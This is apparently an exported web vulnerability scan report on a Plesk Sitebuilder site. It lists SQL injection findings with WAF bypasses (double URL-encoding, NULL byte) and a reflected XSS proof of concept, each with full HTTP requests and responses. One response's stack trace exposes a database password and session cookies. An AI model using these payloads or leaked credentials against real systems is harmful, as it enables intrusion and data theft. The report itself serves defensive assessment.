</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
<h1>403 - Forbidden</h1>

Request 2

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/css/styles.css?template=personal-018&colorScheme=green''&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response 2

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Sun, 10 Oct 2010 06:11:26 GMT
Accept-Ranges: bytes
ETag: "03b69f84168cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:11:29 GMT
Content-Length: 1696

/* content */
.text-header {
   font-weight: bold;
   font-size: 12pt;
   font-family: "Arial Narrow", Arial, sans-serif;
   color: #000000;
}
.pageContent { font-size: 8pt; font-family: Tahoma, sans-serif; color: #7C7C7C; }
.pageContent a { font-size: 8pt; font-family: Tahoma, sans-serif; color: #8D8D8D; }

/* top elements */
.company {
   font-weight: bold;
   font-size: 14pt;
   font-family: "Arial Narrow", Arial, sans-serif;
   color: #FFFFFF;
   font-style: normal;
   text-transform: capitalize;
}
.slogan {
   font-weight: bold;
   font-size: 8pt;
   font-family: "Arial Narrow", Arial, sans-serif;
   color: #FFFFFF;
   font-style: normal;
   text-transform: uppercase;
}

/*main menu*/
.menu {
   font-size: 8pt;
   font-family: Tahoma, sans-serif;
   color: #DFDFDF;
   text-decoration: none;
   font-weight: bold;
}
.amenu {
   font-size: 8pt;
   font-family: Tahoma, sans-serif;
   color: #9CE300;
   font-weight: bold;
}

/*submenu*/
.submenu {
   font-size: 8pt;
   font-family: Tahoma, sans-serif;
   color: #4B4B4B;
   text-decoration: none;
   font-weight: bold;
}
.asubmenu {
   font-size: 8pt;
   font-family: Tahoma, sans-serif;
   color: #4B4B4B;
   text-decoration: underline;
   font-weight: bold;
}

/*bottom menu*/
.bmenu {
   font-size: 8pt;
   font-family: Tahoma, sans-serif;
   color: #4B4B4B;
   text-decoration: none;
   font-weight: bold;
}
.abmenu {
   font-size: 8pt;
   font-family: Tahoma, sans-serif;
   color: #4B4B4B;
   text-decoration: underline;
   font-weight: bold;
}

/*copyright*/
.footer { font-size: 8pt; font-family: Tahoma, sans-serif; color: #3F3F3F; }

/*backgrounds*/
.main-bg { background-color: #E1E1E1; }
.submenu-bg { background-color: #4E8BC1; }
.menu-hr { background-color: #6BA4CF; }
.line { background-color: #CACACA; }


1.6. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/logo.gif [template parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/logo.gif

Issue detail

The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the template request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/logo.gif?template=personal-018%2527&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:07:49 GMT
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>500 - Internal server error.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>500 - Internal server error.</h2>
<h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
</fieldset></div>
</div>
</body>
</html>

Request 2

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/logo.gif?template=personal-018%2527%2527&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response 2

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Sun, 10 Oct 2010 06:07:53 GMT
Accept-Ranges: bytes
ETag: W/"80274794168cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:07:55 GMT
Content-Length: 2060

GIF89aL.8...............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...f..f..f..f.ff.3f..f..f..f..f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3..3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.........H..K..M..S..W..Z..^.._..a..d..g..j..o..s..v..z...................................................................!.......,....L.8......    .H......*\......#J.H..E...A.x.#Bm..il......S.K...7....S.2..z...sX._?}.j^....?.P&......B+..vT........4.D.T....r.6z.......W......o.\}k.....-DsF.f3...>{...;....wG..#........[....m..a..m0Cs.2..'.]P.
.........4....]8.K......e.....m.].......P[>....g.-d.v..A.7........G.gv.........u..5..N.xm.`..o.yc.{[.3.7..g.:....u
q.N<.p..=..C!B...UZk...B..s_.......i.N<...a..D..y..C.>....B..#.....":..3.U(.uT6.%..=y!V...i3....#.90.....#......=....a...Y...y.9b.9.7..CO=.p..:...O[..3O....e7.T.g.~.w......y...6....A....<....7.......u.....#N.2..Tg....r...^C..Si...."=.....K..`6d....&.s*\....:..3dA....>.dsR.....[n...;...N...:+...S.:...?w2...Y.SVA.../;..JR9....8nqC......q......|jP7......mS...|;......<......    I^:,.S..f..N;..C.@....O.:DNj....._.i.9HW......0A......eC.C......u..9...vB....N..HJ.6.LM.>O.....z..9..3.8{...;....@...TmT...9&5N..>3.8...3A....<P...O....D.........6..c|8...<N..SA..C.h..S9C.P\.9.\..7....@.8....L/.?.J...H.=...tc.8...^9..S.@...h.R....k...8.q.......W..c;k..(.x[t..@...u>..9....i.....A.q....(...6.!.p|...``A(...iC..R....A.7.....YE...:...#G....,.#l,    .X...n<...C.....s.........v.......!..m.#<.9!?...w\...X.W..@e.cs...:..3m../.A.>"..zT.+..F.f.$....).k.d.#......J..1.Y.f...7`..y....._J.....C..zH.DC....f.X.;.q........1?..    ..g&9.4....A..^..6.I.r....L.9...;

1.7. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_16.jpg [colorScheme parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_16.jpg

Issue detail

The colorScheme parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the colorScheme parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_16.jpg?template=personal-018&colorScheme=green%00'&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response 1 (redirected)

HTTP/1.1 403 Forbidden
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:11:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
<h1>403 - Forbidden</h1>

Request 2

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_16.jpg?template=personal-018&colorScheme=green%00''&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response 2

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Sun, 10 Oct 2010 06:11:53 GMT
Accept-Ranges: bytes
ETag: "801a8184268cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:11:56 GMT
Content-Length: 621

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................................g...................    .............................................!.1AQq2#...."$.....................!............?....V.E_...$.....
d}..v.(...|....#.s~..!Z..R..E+."F...m.Z.@....3.........J..].`J...... ..%....0.H..*L, ....%.{.h....s.......LV.]_.O.d.]..l.T6g.C...%......3R"...!......KV
'\.../b...[..|%dz......+,=...mq.A.(.8.D........1p.....?-..iq..$...\.K.:E....;..x&J;.yE..u.....<].jDu.l8.#.....@N;p.8...?..

2. Cross-site scripting (reflected)  previous  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image [file parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Modules/Image

Issue detail

The value of the file request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 115d3"><script>alert(1)</script>6ce2f3d0fa8 was submitted in the file parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Wizard/Edit/Modules/Image?file=data/storage/attachments/276e6d26f703339c19673c83a6febf28.jpg115d3"><script>alert(1)</script>6ce2f3d0fa8 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 21:51:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>Internal Sitebuilder error</title>
       <style type="text/css">
           td, .text { font-family: Verdana; font-size: 11px; }
           #stackTrace { background: #EEEEEE; width: 100%; position: absolute; left: 0px; top: 0px; filter: alpha(opacity=80); -moz-opacity: 0.8; opacity: 0.8; }
           #showStackTrace { position: absolute; left: 0px; top: 0px; }
       </style>
   </head>
   
   <body>
       <table width="100%" style="height: 100%" cellspacing="0" cellpadding="0" border="0">
           <tr>
               <td width="100%" height="100%" align="center" valign="middle">
                   <table border="0" cellpadding="0" cellspacing="0">
                       <tr>
                           <td width="60" rowspan="2" valign="top">
                               <img src="/images/unsupported_browser/warning_left.gif" alt=""/>
                           </td>
                           <td valign="middle" height="40" style="background: #EEEEEE; color: #606060;">
                               <center><b>Internal Sitebuilder error.</b></center>
                               File: C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Site\Processor.php; Line: 276<br/>Message: <b>PHP Notice : Trying to get property of non-object</b>; Code: 8<br/>                            </td>
                           <td width="7"><img src="/images/unsupported_browser/warning_right.gif" alt=""/></td>
                       </tr>
                       <tr>
                           <td colspan="2" style="padding-top: 10px;">
                               <table border="0" cellpadding="0" cellspacing="0" width="100%">
                                   <tr>
                                       <td>
                                           <a href="#" onclick="javascript: history.back();"><b>Go back</b></a>
                                       </td>
                                       <td align="right">
                                           <a href="mailto:bugreport@parallels.com?subject=[Sitebuilder problem report] - PHP Notice : Trying to get property of n...&body=This is an automatically generated message about problem with Sitebuilder.%0A%0AFile: C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Site\Processor.php%0ALine: 276%0AMessage: PHP Notice : Trying to get property of non-object%0ACode: 8%0A%0AHost: vulnerarable.plesk.smb.10.2.0.site:2006%0ARequest URI: /index.php/Wizard/Edit/Modules/Image?file=data/storage/attachments/276e6d26f703339c19673c83a6febf28.jpg115d3"><script>alert(1)</script>6ce2f3d0fa8%0ARequest method: GET%0A%0ASitebuilder version: 1.0.0%0ASitebuilder build: 2009110318%0A"><b>Send report to developers</b></a>
                                       </td>
                                   </tr>
                               </table>
                           </td>
                       </tr>
                   </table>
               </td>
           </tr>
       </table>
       <div id="showStackTrace"><a class="text" style="color: #F0F0F0; text-decoration: none;" href="#" onclick="document.getElementById('stackTrace').style.display = 'block';">+</a></div>
       <div id="stackTrace" class="text" style="display: none;" onclick="document.getElementById('stackTrace').style.display = 'none';">
           <pre><b>Stack trace:</b>
Array
(
[0] => Array
(
[function] => SB_ExceptionHandler_EndUser
[args] => Array
(
[0] => Base_SyntaxException Object
(
[message:protected] => PHP Notice : Trying to get property of non-object
[string:private] =>
[code:protected] => 8
[file:protected] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Site\Processor.php
[line:protected] => 276
[trace:private] => Array
(
[0] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\Base\SyntaxException.php
[line] => 48
[function] => handleError
[class] => Base_SyntaxException
[type] => ::
)

[1] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Site\Processor.php
[line] => 276
[function] => handleError
[class] => Base_SyntaxException
[type] => ::
[args] => Array
(
[0] => 8
[1] => Trying to get property of non-object
[2] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Site\Processor.php
[3] => 276
[4] => Array
(
[user] => SB_ORM_User Object
(
[_isPasswordModified:private] =>
[validatorFailList:protected] =>
[_data:protected] => Array
(
[id] => 2
[parent_id] => 1
[plan_id] => 0
[role_id] => 4
[user_settings_id] => 2
[user_name] => admin_Guest
[user_password] =>
[email] =>
[first_name] =>
[last_name] =>
[creation_date] => 2010-09-30T21:32:42-05:00
[auth_cookie] =>
[must_migrate] => 0
[uuid] => f7eca701-2829-833f-7d5d-cba9ebfb3cf9
[password_algo] => 0
[password_salt] =>
)

[_rRepository:protected] => Base_ORM_RelationRepository Object
(
[_relations:private] => Array
(
[settings] => Base_ORM_Relation Object
(
[_name:private] => settings
[_type:private] => 1
[_className:private] => SB_ORM_UserSettings
[_parentField:private] => user_settings_id
[_childField:private] => id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[parentUser] => Base_ORM_Relation Object
(
[_name:private] => parentUser
[_type:private] => 1
[_className:private] => SB_ORM_User
[_parentField:private] => parent_id
[_childField:private] => id
[_cascade:private] =>
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[role] => Base_ORM_Relation Object
(
[_name:private] => role
[_type:private] => 3
[_className:private] => SB_ORM_Role
[_parentField:private] => role_id
[_childField:private] => id
[_cascade:private] =>
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] => SB_ORM_Role Object
(
[validatorFailList:protected] =>
[_data:protected] => Array
(
[id] => 4
[name] => Guest
)

[_rRepository:protected] => Base_ORM_RelationRepository Object
(
[_relations:private] => Array
(
)

)

[_isModified:protected] =>
[_isNew:protected] =>
)

[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[plan] => Base_ORM_Relation Object
(
[_name:private] => plan
[_type:private] => 3
[_className:private] => SB_ORM_Plan
[_parentField:private] => plan_id
[_childField:private] => id
[_cascade:private] =>
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[childReferences] => Base_ORM_Relation Object
(
[_name:private] => childReferences
[_type:private] => 2
[_className:private] => SB_ORM_UserReference
[_parentField:private] => id
[_childField:private] => parent_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[parentReferences] => Base_ORM_Relation Object
(
[_name:private] => parentReferences
[_type:private] => 1
[_className:private] => SB_ORM_UserReference
[_parentField:private] => id
[_childField:private] => child_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[children] => Base_ORM_Relation Object
(
[_name:private] => children
[_type:private] => 2
[_className:private] => SB_ORM_User
[_parentField:private] => id
[_childField:private] => parent_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[ownSites] => Base_ORM_Relation Object
(
[_name:private] => ownSites
[_type:private] => 2
[_className:private] => SB_Site
[_parentField:private] => id
[_childField:private] => user_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[ownHosts] => Base_ORM_Relation Object
(
[_name:private] => ownHosts
[_type:private] => 2
[_className:private] => SB_ORM_Host
[_parentField:private] => id
[_childField:private] => user_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[ownPlans] => Base_ORM_Relation Object
(
[_name:private] => ownPlans
[_type:private] => 2
[_className:private] => SB_ORM_Plan
[_parentField:private] => id
[_childField:private] => user_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[ownPagesets] => Base_ORM_Relation Object
(
[_name:private] => ownPagesets
[_type:private] => 2
[_className:private] => SB_ORM_Pageset
[_parentField:private] => id
[_childField:private] => user_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[ownSiteFamilies] => Base_ORM_Relation Object
(
[_name:private] => ownSiteFamilies
[_type:private] => 2
[_className:private] => SB_ORM_SiteFamilia
[_parentField:private] => id
[_childField:private] => user_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[customSettings] => Base_ORM_Relation Object
(
[_name:private] => customSettings
[_type:private] => 2
[_className:private] => SB_ORM_CustomSetting
[_parentField:private] => id
[_childField:private] => user_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[moduleSettings] => Base_ORM_Relation Object
(
[_name:private] => moduleSettings
[_type:private] => 2
[_className:private] => SB_ORM_ModuleSettings
[_parentField:private] => id
[_childField:private] => user_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

)

)

[_isModified:protected] =>
[_isNew:protected] =>
)

[siteFamilyBroker] => SB_ORM_SiteFamiliaBroker Object
(
[_table:private] => Base_DB_Table Object
(
[_db:protected] => Zend_Db_Adapter_Pdo_Mysql Object
(
[_pdoType:protected] => mysql
[_numericDataTypes:protected] => Array
(
[0] => 0
[1] => 1
[2] => 2
[INT] => 0
[INTEGER] => 0
[MEDIUMINT] => 0
[SMALLINT] => 0
[TINYINT] => 0
[BIGINT] => 1
[SERIAL] => 1
[DEC] => 2
[DECIMAL] => 2
[DOUBLE] => 2
[DOUBLE PRECISION] => 2
[FIXED] => 2
[FLOAT] => 2
)

[_config:protected] => Array
(
[adapter] => PDO_MYSQL
[host] => localhost
[username] => seuser
[password] => ppXiycZdP7
[dbname] => siteeditor
[port] => 3306
[options] => Array
(
[caseFolding] => 0
[autoQuoteIdentifiers] => 1
)

[driver_options] => Array
(
)

)

[_fetchMode:protected] => 2
[_profiler:protected] => Zend_Db_Profiler Object
(
[_queryProfiles:protected] => Array
(
)

[_enabled:protected] =>
[_filterElapsedSecs:protected] =>
[_filterTypes:protected] =>
)

[_defaultProfilerClass:protected] => Zend_Db_Profiler
[_connection:protected] => PDO Object
(
